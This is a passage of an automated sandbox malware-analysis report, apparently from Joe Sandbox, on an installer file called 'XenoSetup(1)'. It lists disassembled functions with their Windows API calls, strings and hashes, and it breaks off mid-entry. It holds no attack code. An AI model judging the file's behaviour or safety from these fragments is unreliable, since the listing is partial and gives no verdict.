String ID:
API String ID: 1269201914-0
Opcode ID: ccbbf2b743fd8c98f4e312e2931ce4f7da93ac4e4d1e4f44cc2d04dcfd0064bb
Instruction ID: d488b4f07fc338133a073180439fdbf2927b146207f0979a0585a78e769473ca
Opcode Fuzzy Hash: ccbbf2b743fd8c98f4e312e2931ce4f7da93ac4e4d1e4f44cc2d04dcfd0064bb
Instruction Fuzzy Hash: 03A012C25991057C310421011D02C3B010CC8C5F60334481DF502C407968481C002430

Function 00FFE541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE51F

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 976dd53de3ef644715245624a2e449c68c175d351cb2dc3fa25359e37bbd6c45
Instruction ID: d488b4f07fc338133a073180439fdbf2927b146207f0979a0585a78e769473ca
Opcode Fuzzy Hash: 976dd53de3ef644715245624a2e449c68c175d351cb2dc3fa25359e37bbd6c45
Instruction Fuzzy Hash: 03A012C25991057C310421011D02C3B010CC8C5F60334481DF502C407968481C002430

Function 00FE9F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,00FE903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00FE9F0C

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: 79e92d51bc0119c273019a090d30122a55795476112d23f947bfd07e03670282
Instruction ID: dae0e1318ee3770b0ad13dd14ed754307c630a197455614ebf8874cbcc4b2ecc
Opcode Fuzzy Hash: 79e92d51bc0119c273019a090d30122a55795476112d23f947bfd07e03670282
Instruction Fuzzy Hash: 57A0223008000E8BCE222B30CA2800C3B20FB20BC030002E8B00BCF0A2CB2F880BCF00

Function 00FFAC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,00FFAE72,C:\Users\user\Desktop,00000000,0102946A,00000006), ref: 00FFAC08

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 061848741c2787ce65e30986a4840e6b23cad1ff87c78d9a02e64dfd192ff4f5
Instruction ID: d26bbb137adcd570ea9c1e425e10cb4bcf35b4f65777b984460f01f2a1dfc0ba
Opcode Fuzzy Hash: 061848741c2787ce65e30986a4840e6b23cad1ff87c78d9a02e64dfd192ff4f5
Instruction Fuzzy Hash: A5A011302002008BCA000A328B0AA0EBAAABFA2B20F00C028A08088020CB3AC820AA00

Function 00FE9620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(000000FF,?,?,00FE95D6,?,?,?,?,?,01012641,000000FF), ref: 00FE963B

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 9c8136366c35718c2f155a63086eaa4cfe1124f2097347f527b2dac9774dc652
Instruction ID: bb654ff95e3cf84d7d77bf6b46ffdda6baef03b05f00ccf1843406afdc801649
Opcode Fuzzy Hash: 9c8136366c35718c2f155a63086eaa4cfe1124f2097347f527b2dac9774dc652
Instruction Fuzzy Hash: 04F0E930885B959FDB308A21C45879277E87B12331F040B1FD0F2429E0D3B5658DAB50

Non-executed Functions

Function 00FFC220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00FE1316: GetDlgItem.USER32(00000000,00003021), ref: 00FE135A
Part of subcall function 00FE1316: SetWindowTextW.USER32(00000000,010135F4), ref: 00FE1370

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00FFC2B1
EndDialog.USER32(?,00000006), ref: 00FFC2C4
GetDlgItem.USER32(?,0000006C), ref: 00FFC2E0
SetFocus.USER32(00000000), ref: 00FFC2E7
SetDlgItemTextW.USER32(?,00000065,?), ref: 00FFC321
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00FFC358
FindFirstFileW.KERNEL32(?,?), ref: 00FFC36E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FFC38C
FileTimeToSystemTime.KERNEL32(?,?), ref: 00FFC39C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00FFC3B8
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00FFC3D4
_swprintf.LIBCMT ref: 00FFC404

Part of subcall function 00FE4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FE40A5

SetDlgItemTextW.USER32(?,0000006A,?), ref: 00FFC417
FindClose.KERNEL32(00000000), ref: 00FFC41E
_swprintf.LIBCMT ref: 00FFC477
SetDlgItemTextW.USER32(?,00000068,?), ref: 00FFC48A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00FFC4A7
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00FFC4C7
FileTimeToSystemTime.KERNEL32(?,?), ref: 00FFC4D7
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00FFC4F1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00FFC509
_swprintf.LIBCMT ref: 00FFC535
SetDlgItemTextW.USER32(?,0000006B,?), ref: 00FFC548
_swprintf.LIBCMT ref: 00FFC59C
SetDlgItemTextW.USER32(?,00000069,?), ref: 00FFC5AF

Part of subcall function 00FFAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00FFAF35
Part of subcall function 00FFAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0101E72C,?,?), ref: 00FFAF84

Strings

REPLACEFILEDLG, xrefs: 00FFC247
%s %s %s, xrefs: 00FFC3F2, 00FFC527
%s %s, xrefs: 00FFC469, 00FFC58E

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: 8df0c3423e8156a8d4782bc70266b729e03ed661ac9996014951c8e9b1d5bff7
Instruction ID: db0d5b6a5ba5a19590fdddb63d8dc3eb93f38d466dc9f49ac0d2517d1b3d38c0
Opcode Fuzzy Hash: 8df0c3423e8156a8d4782bc70266b729e03ed661ac9996014951c8e9b1d5bff7
Instruction Fuzzy Hash: E491A2B254835CBBD231DAA0CD89FFB77ACEF49710F044819B789DA091D73AA6049762

Function 00FE6FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FE6FAA
_wcslen.LIBCMT ref: 00FE7013
_wcslen.LIBCMT ref: 00FE7084

Part of subcall function 00FE7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00FE7AAB
Part of subcall function 00FE7A9C: GetLastError.KERNEL32 ref: 00FE7AF1
Part of subcall function 00FE7A9C: CloseHandle.KERNEL32(?), ref: 00FE7B00

Part of subcall function 00FEA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00FE977F,?,?,00FE95CF,?,?,?,?,?,01012641,000000FF), ref: 00FEA1F1
Part of subcall function 00FEA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00FE977F,?,?,00FE95CF,?,?,?,?,?,01012641), ref: 00FEA21F

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00FE7139
CloseHandle.KERNEL32(00000000), ref: 00FE7155
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00FE7298

Part of subcall function 00FE9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00FE73BC,?,?,?,00000000), ref: 00FE9DBC
Part of subcall function 00FE9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00FE9E70

Part of subcall function 00FE9620: CloseHandle.KERNELBASE(000000FF,?,?,00FE95D6,?,?,?,?,?,01012641,000000FF), ref: 00FE963B

Part of subcall function 00FEA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00FEA325,?,?,?,00FEA175,?,00000001,00000000,?,?), ref: 00FEA501
Part of subcall function 00FEA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00FEA325,?,?,?,00FEA175,?,00000001,00000000,?,?), ref: 00FEA532

Strings

SeCreateSymbolicLinkPrivilege, xrefs: 00FE6FCC
UNC\, xrefs: 00FE7051
SeRestorePrivilege, xrefs: 00FE6FC2
\??\, xrefs: 00FE702B

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3983180755-3508440684
Opcode ID: ed8735efaddf032c9186981a508a5e2ff57ecae2ebba581bdac2daffc024cb66
Instruction ID: 2e0b9c831c2f81f25d1532412d94c8653bcb312d41a64d89fe5e228f5ec1a0bf
Opcode Fuzzy Hash: ed8735efaddf032c9186981a508a5e2ff57ecae2ebba581bdac2daffc024cb66
Instruction Fuzzy Hash: 74C10771D04384AEDB21EB75DC41FEEB7A8BF04310F004559FA96E7182D778AA44EB61

Function 00FFF838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00FFF844
IsDebuggerPresent.KERNEL32 ref: 00FFF910
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00FFF930
UnhandledExceptionFilter.KERNEL32(?), ref: 00FFF93A

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: d263e0e109f6a0e04a57d0a6b3a9788ba8f4e774b17a96d0ab17008f5b94bb91
Instruction ID: 3384522fa100f920dc3a3a5ecfdca53c606ad03b5a3d6952377dae418f5a44da
Opcode Fuzzy Hash: d263e0e109f6a0e04a57d0a6b3a9788ba8f4e774b17a96d0ab17008f5b94bb91
Instruction Fuzzy Hash: 7B312B75D4521D9BDF20DFA4D9897CCBBB8BF04304F1041AAE50CAB290EB759A889F44

Function 00FFE6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32(80000000,00FFE5E8,0000001C,00FFE7DD,00000000,?,?,?,?,?,?,?,00FFE5E8,00000004,01041CEC,00FFE86D), ref: 00FFE6B4
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00FFE5E8,00000004,01041CEC,00FFE86D), ref: 00FFE6CF

Strings

D, xrefs: 00FFE6C3

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: cf2ad254153944c441b6e9372e831acd254adaa68063967406dd812220bcdec6
Instruction ID: c01b9f0daa50ecf9779bd95db92a93b3ec204eeb65d61f920a9f6c45d114819f
Opcode Fuzzy Hash: cf2ad254153944c441b6e9372e831acd254adaa68063967406dd812220bcdec6
Instruction Fuzzy Hash: 50018473A4010D6BDB24DE29DC49AED7BBAAFC4334F0CC124EE59DA264D738D9058690

Function 01008EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 01008FB5
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 01008FBF
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 01008FCC

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 4a07da2a25f6656f52942b58b5a4f9a2b5eb77608b5ae8c98f04f0df0537183a
Instruction ID: f23a59f8a5bb14d904ca1c24764d057b74b6651c04c635fa228e8e605465e6c3
Opcode Fuzzy Hash: 4a07da2a25f6656f52942b58b5a4f9a2b5eb77608b5ae8c98f04f0df0537183a
Instruction Fuzzy Hash: 4531D87494121C9BCB21DF28DC8879CBBB8BF08310F5042EAE51CA72A0E7749B858F44

Function 0100B348 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 0100B4DB

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 31a7226bb83eb6003552d4c96856885b6d0e07000366c5718e4e536e4443548f
Instruction ID: 0bfd3c2d0fa0cdfca4e4ff57b18c659df6c38bcbd5d75ff6a72ad45907ebcd5d
Opcode Fuzzy Hash: 31a7226bb83eb6003552d4c96856885b6d0e07000366c5718e4e536e4443548f
Instruction Fuzzy Hash: 32314B758002496FEB26DE78CC84EFB7BFDDF85314F1441A8F998D7282EA349A448B50

Function 00FFAF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00FFAF35
GetNumberFormatW.KERNEL32(00000400,00000000,?,0101E72C,?,?), ref: 00FFAF84

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: cd345ae55922788e58c788ffdb60e7a55f6c1b528071bd99e67d9d2984732b83
Instruction ID: 9dd4a484d44b5a35906d266a46332cf88e26e18102df1b0088b3833496aafd64
Opcode Fuzzy Hash: cd345ae55922788e58c788ffdb60e7a55f6c1b528071bd99e67d9d2984732b83
Instruction Fuzzy Hash: 53017C7A550309AAD7219FA5EC46F9A77BCFF08710F004022FB45AB194E379A914CBA5

Function 00FE6C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00FE6DDF,00000000,00000400), ref: 00FE6C74
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00FE6C95

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 7d82890af6e37803ca69afeb0a2acda7c92339e806d6dfbca8e9519285f3ea43
Instruction ID: 22f8f0c41f82acb99d74028a6f1700a7ec1cded6aeb2be821e529b474c5b8d3b
Opcode Fuzzy Hash: 7d82890af6e37803ca69afeb0a2acda7c92339e806d6dfbca8e9519285f3ea43
Instruction Fuzzy Hash: AAD0C731344300BFFA150A625D06F1A7B99BF55BE2F24C4047795D80D0C6799414B715

Function 00FFF654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00FFF66A

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 9d805d68313259e407ba894d394a28a68058d96fbc11516580e0d2744b626ba8
Instruction ID: 4eda7eaf33959bef9fe3a5c6ddebaebdc95fb54f848db4ab19f067724bff1487
Opcode Fuzzy Hash: 9d805d68313259e407ba894d394a28a68058d96fbc11516580e0d2744b626ba8
Instruction Fuzzy Hash: D2519EB2D006098FEB25DF54E9817AEBBF0FF88354F24847AC981EB254D379A944CB50

Function 00FEB146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 00FEB16B

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 74e12aceaf7f86a63b191009969ce57836568eeb87812db7de230e27d8ca53cd
Instruction ID: 57b68683f7af6ba317d24054b13692f1fe49250a47bde36464ebbbcb29592861
Opcode Fuzzy Hash: 74e12aceaf7f86a63b191009969ce57836568eeb87812db7de230e27d8ca53cd
Instruction Fuzzy Hash: 24F030B4E002488FDB39CF18E8956DA73F1FB48325F2042A5EA5593384C3BDA9808F60

Function 00FFF9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00FFF3A5), ref: 00FFF9DA

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: ed19652709b326262d64b05584205555cb93f79eafd7561f46ee83a8d5d8ee26
Instruction ID: db1474d92365e174b5aa9e4869a962fa7220c7ed0a03df8f4e8199486bd24066
Opcode Fuzzy Hash: ed19652709b326262d64b05584205555cb93f79eafd7561f46ee83a8d5d8ee26
Instruction Fuzzy Hash:

Function 0100C030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0100C030

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

